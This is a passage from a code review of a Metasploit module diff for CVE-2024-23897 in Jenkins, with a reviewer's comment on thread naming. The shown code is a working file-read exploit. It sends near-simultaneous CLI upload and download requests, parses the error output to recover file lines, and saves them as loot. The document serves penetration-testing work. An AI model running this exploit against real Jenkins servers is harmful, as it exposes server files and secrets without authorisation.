modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb

```diff
@@ -0,0 +1,300 @@
+    #   COMMAND : Name of the command (default: <line 1>)
+
+    # The main thing here is we get the first 2 lines of output from the file.
+    # The 2nd line from the file is returned on line 1 of the output, and line
+    # 1 from the file is returned on the last line of output. If padding was used
+    # then <line 1> will just be a literal 1
+
+    file_contents = []
+    @content_body.split("\n").each do |html_response_line|
+      # filter for the two lines which have output
+      if html_response_line.include? 'ERROR: Too many arguments'
+        file_contents << html_response_line.gsub('ERROR: Too many arguments: ', '').strip
+      elsif html_response_line.include? 'COMMAND : Name of the command (default:'
+        temp = html_response_line.gsub(' COMMAND : Name of the command (default: ', '')
+        temp = temp.chomp(')').strip
+        file_contents.insert(0, temp)
+      end
+    end
+    return if file_contents.empty?
+
+    # if we padded out, then our first line is 1, so drop that
+    file_contents = file_contents.drop(1) if use_pad == true
+
+    print_good("#{datastore['FILE_PATH']} file contents retrieved (first line or 2):\n#{file_contents.join("\n")}")
+    stored_path = store_loot('jenkins.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
+    print_good("Results saved to: #{stored_path}")
+  end
+
+  def download_request(uuid)
+    # send download request
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cli'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => {
+        'Session' => uuid,
+        'Side' => 'download'
+      },
+      'vars_get' => {
+        'remoting' => 'false'
+      }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to download request (response code: #{res.code})") unless res.code == 200
+
+    @content_body = res.body
+  end
+
+  def run
+    uuid = SecureRandom.uuid
+
+    print_status("Sending requests with UUID: #{uuid}")
+
+    # Looking over the python PoCs, they all include threading however
+    # the writeup, and PoCs don't mention a timing component.
+    # However, during testing it was found that the two requests need to
+    # his the server nearly simultaneously, with the 'download' one hitting
+    # first. During testing, even a .1 second slowdown was too much and
+    # the server resulted in a 500 error. So we need to thread these to
+    # execute them fast enough that the server gets both in rapid succession
+
+    use_pad = false
+    threads = []
+    threads << framework.threads.spawn('CVE-2024-23897', false) do
+      upload_request(uuid, use_pad) # try single line file first since we get an error if we have more content to get
+    end
+    threads << framework.threads.spawn('CVE-2024-23897', false) do
+      download_request(uuid)
+    end
```

Comment:
Can we clarify what the threads are doing by including `upload` and `download` in their names (the first argument to `#spawn`). If they are hung of crash, that will help us track down what they were supposed to be doing and save us from guessing which one is which.